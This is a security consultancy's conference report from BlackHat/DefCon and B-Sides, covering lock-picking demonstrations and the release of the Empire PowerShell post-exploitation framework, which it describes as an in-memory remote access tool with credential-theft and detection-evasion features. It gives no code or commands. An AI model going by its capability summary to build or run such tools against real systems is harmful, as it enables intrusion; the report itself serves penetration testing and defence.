Report from BlackHat / Defcon conference in Las Vegas
One of our Loop security experts, specialising in penetration testing. He advises Loop clients on various aspects of information security. He is also an expert lock picker, and believes that with the rapid advances in security technology it is easy to overlook how important physical security is for securing an organisation’s data and systems. If you have a question for him, please email firstname.lastname@example.org.
We started the morning at B-Sides Las Vegas, spent a bit of time with the lock-pickers and even learnt a few new interesting bypass tricks to open locks and doorways with minimal effort (no lock-picking required). Met some very skilled and experienced lock pickers who also showed me a few new ways of teaching people how to pick (including using a hand-made novelty-sized custom lock ‘cylinder’ as a demonstration aid). Also watched a fellow enthusiast pick his way out of four pairs of hand-cuffs (all attached at once, see photo)…
There were great vibes from everyone at the conference, all the participants in the talks (audience and speakers) were quite casual and because the talks/rooms were fairly small (no more than 50-100 people per track), there was lots of feedback and quite lively discussions.
The best talk/presentation I saw was:
Building an empire with powerShell” - http://sched.co/3ueO
The ‘Empire’ Framework for PowerShell post exploitation was released, which is essentially a pure PowerShell post-exploitation agent that can be used as a remote access tool (RAT) and can run entirely in memory. It also combines features of other powerful tools such as Mimikatz and can easily modify its behaviour and methods of communications to evade network detection.
While this tool is being released for use by pen-testers working in red-team engagements, its aim is also to help improve SOC and IR analysis/response procedures around infections in the environment by forcing them to analyse memory dumps of compromised machines to determine what has happened and how to defend against it. There's a stack of really cool features which I could go on about at length, but it is all summarised nicely in the links below:
While we currently deploy various PowerShell scripts during pen-testing, it's not nearly quite as effective as this.
I’ll definitely be using these tools in future engagements so clients better watch out!